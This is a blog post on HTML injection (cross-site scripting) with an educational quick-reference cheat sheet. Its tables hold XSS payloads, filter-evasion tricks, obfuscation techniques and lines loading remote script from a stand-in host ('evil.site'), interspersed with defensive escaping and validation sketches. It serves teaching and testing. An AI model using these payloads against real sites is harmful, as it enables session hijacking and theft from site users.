HTML Injection – Deadliest Web Attacks


Intro

Friends, Romans, visitors, lend me your eyes. I’ve added an HTML injection quick reference (HIQR) to the site. It’s not in iambic pentameter, but there’s a certain rhythm to the placement of quotation marks, less-than signs, and alert() functions.

For those unfamiliar with HTML injection (or cross-site scripting in the vulgate), it’s a vulnerability that enables an attacker to modify a page in order to affect the behavior of a victim’s browser. As the name suggests, the attacker injects markup or JavaScript, usually via a form field or querystring parameter, into a string that is then re-displayed by the app. In the worst cases, the app delivers malicious content to anyone who visits the infected page. Insecure string concatenation is the most common programming error that leads to this flaw.

Imagine an app that permits users to write <img> tags in posts to show off cute pictures of spiders. The app expects users to add images with src attributes that point anywhere on the web. For example,

<img src="http://web.site/image.png">

Were users of the app to limit themselves to nicely formed http: or https: schemes, all would be well in the world. However, there’s already trouble brewing in the form of javascript: schemes. For example, a malicious user could inject arbitrary JavaScript into the page — a dangerous situation considering the JavaScript will be executing within the Same Origin Policy of the web app.

<img src="javascript:alert(9)">
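One way an app might enforce the scheme restriction is to parse the value and compare its scheme against an allowlist instead of pattern-matching the raw string. The following is a minimal sketch, assuming a runtime with the WHATWG URL class (Node.js or a browser). The name isAllowedImageUrl and the allowlist are illustrative, not taken from any real app.

```javascript
// Hypothetical helper: accept only absolute http: or https: URLs.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

function isAllowedImageUrl(value) {
  let url;
  try {
    // The URL parser lowercases the scheme, so "JaVaScRiPt:" cannot slip by.
    url = new URL(value);
  } catch (e) {
    return false; // relative or unparsable values are rejected in this sketch
  }
  return ALLOWED_SCHEMES.has(url.protocol);
}

console.log(isAllowedImageUrl('http://web.site/image.png')); // true
console.log(isAllowedImageUrl('javascript:alert(9)'));       // false
console.log(isAllowedImageUrl('JaVaScRiPt:alert(9)'));       // false
```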

Then there’s the trouble with attributes. Even if the site restricted schemes to http: or https:, a (not-at-all) devious hacker could add an inline event handler. For example,

<img src="http://&" onerror=alert(9)>

Now the attacker has two ways of executing JavaScript in their victim’s browsers — javascript: schemes and event handlers.

There’s more. Suppose the app writes anything the user submits into the web page. We’ll even imagine that the app’s developers have decided to enforce an http: or https: scheme and they only allow visitors to define a src value. In order to be more secure, the web app writes the src value into an element that’s guaranteed to not have any event handlers. This is where string concatenation rears its ugly, insecure head. For example, the hacker submits the following src attribute:

http:"><script>alert(9)</script>

The app pops this value into the src attribute and, presto!, a new element appears. Notice the two characters at the end of the line, ">. These were the intended end of the src attribute and tag, which the hacker’s payload subverted:

<img src="http:"><script>alert(9)</script>">
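The concatenation flaw can be reproduced in a few lines. This is a sketch, not the code of any particular app: renderImageUnsafe, renderImageEscaped, and escapeHtml are hypothetical names, and the payload is one that closes the attribute and opens a script element. Encoding the value for the HTML attribute context keeps it inside the quotes.

```javascript
// Insecure: the submitted value is concatenated straight into markup.
function renderImageUnsafe(src) {
  return '<img src="' + src + '">';
}

// Hypothetical fix: encode the characters that are significant in HTML
// before the value reaches a double-quoted attribute.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderImageEscaped(src) {
  return '<img src="' + escapeHtml(src) + '">';
}

const payload = 'http:"><script>alert(9)</script>';
console.log(renderImageUnsafe(payload));
// <img src="http:"><script>alert(9)</script>">
console.log(renderImageEscaped(payload));
// <img src="http:&quot;&gt;&lt;script&gt;alert(9)&lt;/script&gt;">
```

The escaped version still produces a broken image, but the browser sees one element with one attribute rather than markup chosen by the attacker.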

HTML injection attacks become increasingly complex depending on the context where the payload is rendered, the characters that are stripped or escaped by data validation filters, the patterns used to detect malicious payloads, and the encoding of the payloads and the page. Check out chapter 2 of HWA for more background on these situations.

You’ll find more info on this blog in articles with an “html injection” category or tag.

SPQR (Senātus Populusque Rōmānus) was the Latin abbreviation used to refer to the collective citizens of the Roman empire. Read up on HTML injection and you’ll become SPQH (Senātus Populusque Haxxor) soon enough.

HTML Injection Quick Reference (HIQR)

Mike Shema, Deadliest Web Attacks
The latest revision is at https://mutantzombie.github.io/HIQR/hiqr.html

Table 1: Injection Techniques for Various Parsing Contexts
Table 2: Payload Crafting Techniques to Bypass Filters and Data Validation
Table 3: JavaScript Compositions for Manipulation & Obfuscation

Table 1: Injection Techniques for Various Parsing Contexts

Context / State / Injection Example
Data state (text node, open tag)
    Welcome back, <script>☣</script>...
  </element>
    <title>Search Results for '</title>☣'
  -->
    <!-- lorem ipsum --><script>☣</script>-->
  ]]>
    <FOO><![CDATA[]]><script>☣</script>]]>
Attribute value
  Unquoted
    <input type=text name=foo value=a><script>☣</script>>
    <input type=text name=foo value=a/><script>☣</script>>
  Single-quoted (U+0027)
    <input type=text name=foo value=''onevent=☣//'>
  Double-quoted (U+0022)
    <input type=text name=foo value=""onevent=☣//">

JavaScript variable assignment
  Unquoted
  Single-quoted (U+0027)
    <script> var foo='';☣;//';
  Double-quoted (U+0022)
    <script> var foo="";☣;//";
  Escape characters
    (blog post)

JavaScript Window.location object property (.hash, .href, .pathname, .search)
  URL
    http://web.site/page/<script>☣</script>
    <script>document.write("Page not found: " + window.location);
  #fragment
    <script>document.write(window.location);
  #jQuery
    http://web.site/page#<img/src=%22%22onerror=☣>
    $(document).ready(function() {
      var x = (window.location.hash.match(/^#([^\/].+)$/) || [])[1];
      var w = $('a[name="' + x + '"], [id="' + x + '"]');
    });
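For the JavaScript variable assignment context, HTML escaping is the wrong tool; the value has to be serialized as a string literal that neither the JavaScript parser nor the HTML parser can break out of. Here is a minimal sketch, assuming the value lands inside an inline script block. The helper name toScriptStringLiteral is hypothetical.

```javascript
// Hypothetical helper: serialize untrusted text as a JavaScript string literal
// that can be placed inside an inline <script> block.
function toScriptStringLiteral(text) {
  return JSON.stringify(String(text))
    // Keep "</script>" and "<!--" away from the HTML parser.
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    // Line separators were not valid inside string literals before ES2019.
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

const payload = '";alert(9);//</script>';
console.log('<script>var foo=' + toScriptStringLiteral(payload) + ';</script>');
// <script>var foo="\";alert(9);//\u003c/script\u003e";</script>
```

JSON.stringify handles the quote and backslash escapes; the extra replacements cover characters that matter to the surrounding HTML rather than to JavaScript itself.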

Footnotes

1 The biohazard symbol (U+2623) – ☣ – in each example represents a JavaScript payload. It could be anything from a while loop to DoS the browser, e.g. var a;while(1){a+="a"}, to the ubiquitous alert(9). These categories focus on the placement of the payload within the rendered document rather than the effect of the payload.
Though it seems daunting to review the HTML5 syntax specification, doing so aids in understanding how HTML is supposed to be formed. HTML5 defines an explicit algorithm for parsing HTML documents. Read through the spec to become familiar with the expectations of Unicode code points, parse errors, and decisions a User Agent may make when dealing with markup. A standardized approach to parsing is supposed to minimize the quirks and differences among browsers, thus removing a historical source of insecurity. The HTML4 spec was not as clear or as rigorous on parsing.
2 Sometimes it’s helpful to insert a space before the --> to ensure the tag is interpreted. [ HTML5 comments ]
3 This is a quirk of jQuery’s design choice for overloading the $() API to accept selectors or elements. Read about the interplay of JavaScript and Content Security Policy on the blog.
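The #jQuery row turns on a pattern that accepts nearly anything after the hash. A rough sketch of the difference between that pattern and a stricter one follows. Both function names are hypothetical, nothing here is jQuery API, and the strict pattern assumes anchor names are limited to letters, digits, hyphens, and underscores.

```javascript
// The pattern from the table: anything that does not start with "/" passes.
function looseFragmentName(hash) {
  return (hash.match(/^#([^\/].+)$/) || [])[1];
}

// Hypothetical guard: accept only fragments that look like simple anchor names.
function safeFragmentName(hash) {
  const match = /^#([A-Za-z][A-Za-z0-9_-]*)$/.exec(hash);
  return match ? match[1] : null;
}

const hash = '#<img/src=%22%22onerror=alert(9)>';
console.log(looseFragmentName(hash));        // <img/src=%22%22onerror=alert(9)>
console.log(safeFragmentName(hash));         // null
console.log(safeFragmentName('#section-2')); // section-2
```

With the strict version, markup never reaches the string that is concatenated into the selector.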

Table 2: Payload Crafting Techniques to Bypass Filters and Data Validation

Concept / Notes / Payload Example
Alternate attribute delimiters
  Forward slash
    <img/src=""onerror=alert(9)>
  Dangling quoted string
    <a'' href'' onclick=alert(9)>foo</a>
    <a"" href=""onclick=alert(9)>foo</a>
  CRLF instead of space
    <img%0d%0asrc=""%0d%0aonerror=alert(9)>
HTML entity encoding
  JavaScript scheme (decimal, hex, Unicode)
    <a href="java&#115;cript:alert(9)">foo</a>
    <a href="java&#x73;cript:alert(9)">foo</a>
    <a href="java&#x0073;cript:alert(9)">foo</a>
JavaScript inline event handlers (HTML4 or HTML5)
  Unquoted
    <input type=text name=foo value=a%20onchange=alert(9)>
  Double-quoted
    <input type="text" name="foo" value=""onmouseover=alert(9)//">
  Single-quoted
    <input type='text' name='foo' value=''onclick=alert(9)//'>
  HTML5 autofocus
    <input type="text" name="foo" value=""autofocus/onfocus=alert(9)//">
Data URI handlers
  src & href attributes
    <a href="data:text/html,<script>alert(9)</script>">foo</a>
    <script src="data:,alert(9)"></script>
    <script src="data:application/x-javascript,alert(9)"></script>
  Base64 data
    <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg">foo</a>
    <script src="data:;base64,YWxlcnQoOSk"></script>
  Alternate character sets
    <a href="data:text/html;charset=utf-16,%ff%fe%3c%00s%00c%00r%00i%00p%00t%00%3e%00a%00l%00e%00r%00t%00(%009%00)%00<%00/%00s%00c%00r%00i%00p%00t%00>%00">foo</a>

Alternate markup
  SVG
    <svg onload="javascript:alert(9)" xmlns="http://www.w3.org/2000/svg"></svg>
    <svg xmlns="http://www.w3.org/2000/svg"> <g onload="javascript:alert(9)"></g></svg>
    <svg><script xlink:href=data:,alert(9)></script>
    <svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(9)"> <rect width="1000" height="1000" fill="white"/></a></svg>
Untidy markup
  Missing greater-than sign
    <script%0d%0aalert(9)</script>
    <script%20<!--%20-->alert(9)</script>
  Recover from syntax error
    <a href=""&<img&amp;/onclick=alert(9)>foo</a>
    <script/<a>alert(9)</script>
    <script/<a>alert(9)</script </a>
  Uncommon syntax
    <a""id=a href=''onclick=alert(9)>foo</a>
  Orphan entity
    <a href=""&amp;/onclick=alert(9)>foo</a>
  Vestigial attribute
    <script/id="a">alert(9)</script>

Anti-regex patterns
  Element closed prematurely
    <img src=">"onerror=alert(9)>
  Element confusion
    <img id="><"class="><"src=">"onerror=alert(9)>
  Quote confusion
    <img src="\"a=">"onerror=alert(9)>
    <a id=' href="">'href=javascript:alert(9)>foo</a>
    <a id='href=http://web.site/'onclick=alert(9)>foo</a>
    <a href= . '"\' onclick=alert(9) '"'>foo</a>
  Quote confusion with element
    <img src="\"'<a href='">"'onerror=alert(9)>
    <a id='http://web.site/'onclick=alert(9)<!--href=a>foo</a>-->
  Quote mixing with element
    <img src="'"id='<img src="">'onerror=alert(9)>
  Recursive elements
    <img src="<img src='<img src=.>'>"onerror=alert(9)>
  Repeated attributes (match last occurrence)
    <a href=javascript:alert(9) href href='' href="">foo</a>
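To see why the anti-regex payloads work, consider a filter that finds tags with a regular expression and then looks for event handlers inside each match. The filter below is a deliberately naive, hypothetical example (naiveFilterAllows is not from any real product); it only illustrates how a pattern's idea of where a tag ends can differ from the browser's.

```javascript
// Hypothetical filter: find each tag with a regex and reject the input if any
// tag text contains whitespace followed by an inline event handler.
function naiveFilterAllows(html) {
  const tags = html.match(/<[^>]*>/g) || [];
  return tags.every((tag) => !/\son\w+\s*=/i.test(tag));
}

// Caught: the handler sits inside the matched tag, after a space.
console.log(naiveFilterAllows('<img src="a" onerror=alert(9)>')); // false

// Missed: the regex ends the tag at the ">" inside the quoted src value.
console.log(naiveFilterAllows('<img src=">"onerror=alert(9)>'));  // true

// Missed: no whitespace precedes the handler.
console.log(naiveFilterAllows('<img/src=""onerror=alert(9)>'));   // true
```

A browser's parser tracks quoting state and attribute delimiters; the regex does neither, so the payload only has to satisfy the parser.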

Footnotes

1 HTML5’s Content Security Policy headers can neutralize these attacks by preventing the User Agent from executing JavaScript within this context unless the page author is forced to include the “unsafe-inline” directive.
2 The basic format is dataurl := "data:" [ mediatype ] [ ";base64" ] "," data. The scheme is defined in RFC 2397.
3 Per HTML5 spec, “When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).”
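The data URL grammar in footnote 2 is small enough to pick apart by hand, which is handy when checking what a Base64 payload really contains. The following sketch assumes Node.js (for Buffer) and UTF-8 payloads; parseDataUrl is a hypothetical helper and makes no attempt to handle other charsets such as the UTF-16 example.

```javascript
// Minimal sketch of the RFC 2397 grammar: data:[<mediatype>][;base64],<data>
function parseDataUrl(url) {
  const match = /^data:([^,]*?)(;base64)?,(.*)$/is.exec(url);
  if (!match) return null;
  const [, mediatype, base64, data] = match;
  const body = base64
    ? Buffer.from(data, 'base64').toString('utf8') // Node tolerates missing "=" padding
    : decodeURIComponent(data);                    // assumes UTF-8 percent-encoding
  // RFC 2397 defaults an omitted media type to text/plain;charset=US-ASCII.
  return { mediatype: mediatype || 'text/plain;charset=US-ASCII', body };
}

console.log(parseDataUrl('data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg').body);
// <script>alert(9)</script>
console.log(parseDataUrl('data:;base64,YWxlcnQoOSk').body);
// alert(9)
```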

Table 3: JavaScript Compositions for Manipulation & Obfuscation

Technique / Notes / Example
Concatenation
  String operators
    var a = "foo"+alert(9)//";
  Logical operators
    var a = "foo"&&alert(9)//";
  Mathematical operators
    var a = "foo"-alert(9)//";

Function execution
  Anonymous
    (function(){alert(9)})()
  Method lookup
    window["alert"](9)

Strings
  String object
    String.fromCharCode(0x61,0x62)
  Regex object (source attribute)
    alert(/foo bar/.source)
    window[/alert/.source](9)

Harness function from a JavaScript library
  Angular
    angular.bind(self, alert, 9)()
    angular.element.apply(alert(9))
  Ember JS
    Ember.run(null, alert, 9)
  jQuery
    $.get('//evil.site/') (site serves alert(9))
    $.getScript('//evil.site/') (site serves alert(9))
    $('#main').load('//evil.site/'); (site serves <script>alert(9)</script> into selector, e.g. #main)
  Prototype
    Prototype.K(alert)(9)
    new Ajax.Request('//evil.site/')
  Underscore
    _.defer(alert, 9)
    _.delay(alert, 0, 9)
    _.once(alert(9))

Type coercion
  1. Boolean plus Object converts to String
    false + "" == "false"
    ![] + []
  2. Extract character from String by index
    ( false + "" )[1] == "a"
    ( ![] + [] )[1]
  3. Compose String from characters
    (![]+[])[1] + (![]+[])[2] + (![]+[])[4] + (!![]+[])[1] + (!![]+[])[0]
  4. Execute function by method lookup
    (window["alert"])(9)
    (window["ale"+"rt"])(9)
    (window[(![]+[])[1] + (![]+[])[2] + (![]+[])[4] + (!![]+[])[1] + (!![]+[])[0]])(9)
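The four type coercion steps can be checked outside a browser. In the sketch below a stand-in object takes the place of window so the code runs under Node.js; fakeWindow and calls are illustrative names only.

```javascript
// Step 1: a boolean plus an empty array coerces both operands to strings.
const f = ![] + [];  // "false"
const t = !![] + []; // "true"

// Steps 2 and 3: pick characters by index and join them.
const name = f[1] + f[2] + f[4] + t[1] + t[0]; // "a" + "l" + "e" + "r" + "t"

// Step 4: method lookup by computed name. In a page the object would be window.
const calls = [];
const fakeWindow = { alert: (value) => calls.push(value) };
fakeWindow[name](9);

console.log(name);  // alert
console.log(calls); // [ 9 ]
```

Nothing in the composed expression contains the letters of the function name, which is why filters that search for the literal string alert miss it.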